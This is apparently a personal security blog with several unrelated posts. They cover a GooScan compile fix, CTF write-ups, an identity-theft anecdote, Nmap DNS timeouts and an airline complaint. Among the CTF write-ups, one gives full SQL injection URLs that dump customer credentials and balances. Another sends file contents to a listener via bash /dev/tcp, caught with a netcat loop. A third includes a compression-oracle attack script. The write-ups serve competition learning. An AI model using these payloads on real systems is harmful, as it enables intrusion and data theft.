0

GooScan compilation errors

-

I was just browsing away when I stumbled upon Johnny Long’s GooScan. He says that this is a Linux only tool but it seems to compile (not without problems though) on cygwin.
I kept getting the following errors:


L:\tools\gooscan-v1.0.9>gcc gooscan.c
gooscan.c: In function `inet_send':
gooscan.c:575: error: `MSG_WAITALL' undeclared (first
use in this function)
gooscan.c:575: error: (Each undeclared identifier is
reported only once
gooscan.c:575: error: for each function it appears in.)

Then I read somewhere that MSG_WAITALL is not defined for Cygwin and that instead of that zero would work. There are many neater solutions to this…but I’m a hacker and I’ll do the stuff that’s easiest and hassle-free.
Some people say that the following will work:
#ifdef __CYGWIN__
#define MSG_WAITALL 0

So in order to compile this bad boy, you need to goto line 574 in your favorite editor.
It looks like this:
recv(sock, recvbuf, sizeof(recvbuf), MSG_WAITALL);

You need to make it look like this:
recv(sock, recvbuf, sizeof(recvbuf), 0);//MSG_WAITALL);

You are all set:
gcc gooscan.c -o gooscan.exe

Compilation works! But then I observed that the results were not coming well. However, if you run it through a local proxy such as burp it still works…I bet it has something to do with socket establishment and receiving and being incompatible with the MSG_WAITALL flag.
But as long as you can get the results … who cares? If someone figures out exactly how to make this work, please post it as a comment.

2

DefCon CTF Quals GrabBag400 Writeup

-

This was an interesting PostgreSQL injection challenge.
What is Jeff Moss’ checking account balance?
Bank Site – http://140.197.217.85:8080/boa_bank
User:blacksheep
Password:luvMeSomeSheep

The username and password is to get around the .htaccess that protects the site. There was a page with the zip code search on it. The zip parameter was vulnerable to SQL injection (verified by entering a ‘ character in the zip parameter). With this information you

SQL injection in zip parameter. http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20or%201=1–&Submit.x=0&Submit.y=0

List of databases can be found by: http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20datname,datname,datname,datname,1,datname%20FROM%20pg_database&Submit.x=0&Submit.y=0

Names of databases
——————
template1
template0
postgres
boa_bank

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20relname,A.attname,relname,A.attname,1,relname%20FROM%20pg_class%20C,pg_namespace%20N,pg_attribute%20A,pg_type%20T%20WHERE%20(C.relkind=’r’)%20AND%20(N.oid=C.relnamespace)%20AND%20(A.attrelid=C.oid)%20AND%20(A.atttypid=T.oid)%20AND%20(A.attnum%3E0)%20AND%20(NOT%20A.attisdropped)%20AND%20(N.nspname%20ILIKE%20’public’)&Submit.x=0&Submit.y=0

With this query it’s easy to evaluate the type of the parameter as well as the position. This was done by the error message that indicated an “int cannot be compared to text”.

Table,column_name
—————–
transaction,amount
transaction,account
transaction,id
transaction,date
branch,id
branch,zip
branch,city
branch,name
branch,street
branch,phone
branch,state
customer,id
customer,firstname
customer,password
customer,lastname
customer,username
customer,email
account,id -> int
account,owner -> int
account,account -> string
account,balance
account,type -> checking/savings
sqlmapfile,data
test2234,t
hkk,t
mydata,t
mytable,mycol
hk,hk
sonic,sonic

Getting all customers (Jeff Moss can’t be found in the list though)
http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20C.firstname,C.lastname,C.username,C.password,1,C.email%20FROM%20customer%20C&Submit.x=0&Submit.y=0
Lots of complaints were heard that the record wasn’t present for Jeff Moss. But if you just filtered by ‘checking’ account, you would see that it was all the same for all users. The following query gives the list of all checking accounts…but if you notice the value is $0.00 for all checking accounts so Jeff Moss’ account should be 0.00 too!!!

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20A.account,A.type,A.type,cast(A.balance%20as%20text),A.owner,A.account%20FROM%20account%20A%20where%20A.type%20ILIKE%20’checking’&Submit.x=0&Submit.y=0

Fun times!

0

The case of an ID theft scam

-

An interesting incident happened this past week to a friend – he had his identity stolen. More specifically, someone got a hold of his social security number (SSN), his date of birth (apparently) and his address. What the scammers or their “mules” (a term used to describe criminals who act on behalf of the actual criminal at their behest) did was that they went to the bank and requested to wire a huge sum of money to an account. The neat trick they played was before actually going to the bank they called the Verizon helpdesk and suspended my friend’s phone service. When they reached the bank and showed the bank agent the ID (some sort of a non-standard / fake ID) and gave the SSN to the bank agent, he/she grew suspicious and tried to contact my friend. However, due to Verizon suspending his phone service, the bank agent couldn’t get a hold of my friend. Luckily, the bank agent also sent my friend an email to which he responded promptly. The culprits were arrested and the investigation is still on.
What was quite interesting was, the modus operandi where the criminals know that banks rely on calling the customers if they suspect fraud and they had this covered. Quite intelligent.
So, you know what you need to do if your phone suddenly stops working – check if ID thieves have had a run on you, change all your passwords including email, change your credit card accounts and bank accounts and PINs and place a hold on your credit history with the credit reporting agencies such as Experian, Equifax and TransUnion.

0

Nmap and DNS resolution Timeouts

-

I think Nmap is by far the best portscanner around if you want to do some serious port-scanning. Nmap performs a DNS resolution by default. This is good for obtaining the fully qualified domain names (FQDN), however, in some cases when you are scanning huge networks spanning several class Bs, it can have a significant effect on the duration of the scan.
Although using the -n parameter can completely stop nmap from performing any resolutions, but sometimes there’s that fine granularity that you need, i.e., you want to perform name resolutions but not if it exceeds a certain amount of time. I have to say that I wouldn’t have even craved for such an idiosyncratic feature, had it not been for nmap. Fyodor has been awesome enough to provide fine-grained control over port-scanning to your heart’s content.
So I opened up the nmap code, trying to figure out if I could fine tune that feature myself and I was not at all surprised that there were several comments in the code that would give you the impression that the authors of nmap have been considering this feature.
At this time it seems that the timeouts for the DNS servers are being read out of an arrayname:
static int read_timeouts[][] in nmap_dns.cc.
The way the code works is, this array has retransmission timeouts. Each row of this array represents what retransmission timeouts that nmap will follow depending on the number of DNS servers provided.

In nmap 4.76, therefore, if you specify one DNS server (or only one entry exists in /etc/resolv.conf) nmap will wait 4000ms, then another 4000ms followed by 5000ms before giving up. But if you do specify two DNS servers, then for the first DNS server the timeouts are 2500ms followed by 4000ms and then the same is tried for the 2nd entry in the DNS servers. Therefore, it seems that nmap will wait 13 seconds at max before giving up on the DNS resolution of a host. Imagine scanning a class B and having to wait 13 seconds for each of the hosts to resolve. It would be a significant overhead.

Of course, one can find other things to do if the IP address space is not DHCP, e.g., starting a separate list scan (-sL) and a portscan (with -n) simultaneously so that the DNS resolution timeouts do not result in a major impact as far as the portscanning itself is concerned.
There could be pros and cons to this as well which I may have failed to consider. But at this time it seems that it might be the most judicious approach.

3

Plaid CtF 2011 – Writeup #16

-

The Plaid Parliament of Pwning organized their own Capture-the-Flag (CtF) contest this past weekend. It was an excellent CtF with about 36 challenges ranging from trivia, exploitation, reverse engineering, web exploitation, cryptography, and forensics.

My writeup for #16 – Plain sight [200 pts] web

The problem was

The time to strike is now! This fiendish AED employee decided to hide secret data on this website (http://a4.amalgamated.biz/cgi-bin/chroot.cgi)
It seems that the employee was in the middle of creating the website when our operatives stumbled upon it.
The good news is that there are surely bugs in the development version of this problem, the bad news is currently no feedback printed to users.
Some of our leet operatives have determined a little bit about the machine: it runs in a read-only environment with only
bash cat dc expand grep hd head id less ls more nl od pr rev sh sleep sort sum tail tar tr true tsort ul wc yes
installed.

Find what AED is hiding, good luck and godspeed.

There was a URL http://a4.amalgamated.biz/cgi-bin/chroot.cgi that allowed remote code execution.
bash, cat, less, more, ls were allowed.

First thing I did was checked if the bash TCP connections were allowed using:
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?ls>/dev/tcp/MYIP/5000

That seemed to work. So then I listed the directories one by one until I bumped onto:
I used http://a4.amalgamated.biz/cgi-bin/chroot.cgi?cat%20keyfolder/key>/dev/tcp/MYIP/5000 I had the port forwarded to my PC and a netcat listener running in a loop
while [ 1 ]
do
nc -l -v -p 5000
done

The answer was esc4p3_str1ng5.

Fun times!

0

PlaidCTF 2013 – Crypto 250 Compression Writeup

-

On the recently concluded PlaidCTF (which was an awesome competition) by PPP there was a problem.  Here it goes:

Question: We managed to get the source code for an encryption service running at 54.234.224.216:4433.

I have listed the python source provided below:

#!/usr/bin/python
import os
import struct
import SocketServer
import zlib
from Crypto.Cipher import AES
from Crypto.Util import Counter

# Not the real keys!
ENCRYPT_KEY = '0000000000000000000000000000000000000000000000000000000000000000'.decode('hex')
# Determine this key.
# Character set: lowercase letters and underscore
PROBLEM_KEY = 'XXXXXXXXXXXXXXXXXXXX'

def encrypt(data, ctr):
    aes = AES.new(ENCRYPT_KEY, AES.MODE_CTR, counter=ctr)
    return aes.encrypt(zlib.compress(data))

class ProblemHandler(SocketServer.StreamRequestHandler):
    def handle(self):
        nonce = os.urandom(8)
        self.wfile.write(nonce)
        ctr = Counter.new(64, prefix=nonce)
        while True:
            data = self.rfile.read(4)
            if not data:
                break

            try:
                length = struct.unpack('I', data)[0]
                if length > (1<<20):
                    break
                data = self.rfile.read(length)
                data += PROBLEM_KEY
                ciphertext = encrypt(data, ctr)
                self.wfile.write(struct.pack('I', len(ciphertext)))
                self.wfile.write(ciphertext)
            except:
                break

class ReusableTCPServer(SocketServer.ForkingMixIn, SocketServer.TCPServer):
    allow_reuse_address = True

if __name__ == '__main__':
    HOST = '0.0.0.0'
    PORT = 4433
    SocketServer.TCPServer.allow_reuse_address = True
    server = ReusableTCPServer((HOST, PORT), ProblemHandler)
    server.serve_forever()

The key on this challenge is to see that the stream encryption is being done on the compressed input. In the source provided, if the user input is similar to the secret value in the PROBLEM_DATA variable then the zlib.compress() function would show a reduced length ciphertext. This is somewhat (and I use the term loosely) similar to the CRIME vulnerability. The AES Counter mode RFC has the implementation details of the cipher. So I wrote the following script.

import socket
import sys
from itertools import *
import struct
def display(msg,numbytes):
	#print >>sys.stderr, 'received "%s"' % msg
	#print >>sys.stderr, 'bytes "%d"' % numbytes
	print >>sys.stderr, 'bytes %d ' % numbytes + msg.encode('hex')
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = ('54.234.224.216', 4433)
print >>sys.stderr, 'connecting to %s port %s' % server_address
sock.connect(server_address)
#mesage len = 20 lowercase and underscore letters
try:
	amount_received = 0
	nonce = sock.recv(8)
	amount_received += len(nonce)
	# Send data
	#strng = 'crime_some'
	#minciphlen = 1000
	#strng = 'crimes_pays'
	#strng = 'so_'
	#strng = 'crime_some_times_pays'
	#strng = 'somet_'
	strng = 'cr'
	minchar = ''
	ciphlen = 1000
	sampleset = 'hijklmnopqrstuvwxyz_abdefgc'
	#while True:
	strng = strng + minchar	
	minciphlen = ciphlen
	minchar = ''
	for s in map("".join,permutations(sampleset,1)):
		#message = nonce +  (strng + s)*10  #'\x00'*11 + s
		message = strng + s
		datalen = struct.pack('I',len(message))  # datalen = '\xe4\x00\x00\x00'
		sock.sendall(datalen)
		#print >>sys.stderr, 'sending '+ message
		sock.sendall(message)
		#print >>sys.stderr, 'message sent'
		amount_received = 0
		# Look for the response
		data = sock.recv(4)
		amount_received += len(data)
		ciphlen = struct.unpack('I', data)[0]
		#print >>sys.stderr, message + ' ' 
		amount_received = 0
		if ciphlen <= minciphlen:
			minciphlen = ciphlen
			minchar = s
			print str(ciphlen) + ' It is ' + strng + minchar
		data = sock.recv(ciphlen)
		#display(data,ciphlen)		
finally:
    print >>sys.stderr, 'closing socket'
    sock.close()

When you connect to the service it provides you the nonce, so I prepended the nonce to the plaintext. The above script shows the plaintext and the length of the cipher text. To start off with this, you start with a string of length 1, and see which is the smallest length response, that gives your first character. Then in the

strng

variable above, you add that character and run again, and the lowest length ciphertext tells you the next character and so on. I noticed that sometimes the output had a few characters with the lowest length. So I tried each of them and ended up with the following flag:

crime_sometimes_pays 
2

Beckon Air Deccan

-

The introduction of low-cost flying alternatives in the Indian skies is a good thing for the Indian consumers as one would reckon. However, the consumers only stand to gain if they get a service which at least gets them their money worth.
Sadly though, the quality of service provided by these low-cost airlines is also “low-grade”. The business principle seems sound that people who want food/refreshments in flight buy it but that does not necessarily mean that one gets hard pressed to board the flight itself. The airline management needs to rethink that low-cost does not mean high tension. My flight experience was as follows:
I was to board the flight from Delhi – Mumbai at around 9:00 pm. However, until 10:30 pm there were no announcements which made me ponder about the very existence of the flight itself. At about 11:00 pm it was announced that the entry would be from Gate # 3. The people rushed in like a horde of animals trying to get into a DTC (Delhi Transport Corporation) bus. Then a technical snag – the key was unable to open the gate # 3 – occurred to make the matters worse. The gates were changed to Gate # 1 resulting into a new frenzy of people trying to reach gate # 1. In what ensued, there were a series of announcements for passengers to board the flight, however, there was a slight problem. The officials on Gate # 1 were not ready to let passengers through. The flights like “Air Deccan” have given a new meaning to the term “fight to the finish” as your fight to get a seat in the flight never ends!

Now I’ve no problems considering that the population of India is huge. However, I do have a problem when seemingly intelligent (?) people do not display basic intelligence. Air Deccan issues unique numbers on it’s boarding passes when people check-in. Why these numbers are not used for seat assignments is a question that only Air Deccan can answer. Apparently, they use these numbers to identify which passengers have / have not boarded the flight.

Unitl these companies realize that cheap tickets should not mean cheap quality the consumers will continue to remain at a loss in these airlines which are advertized as a “high value for money”.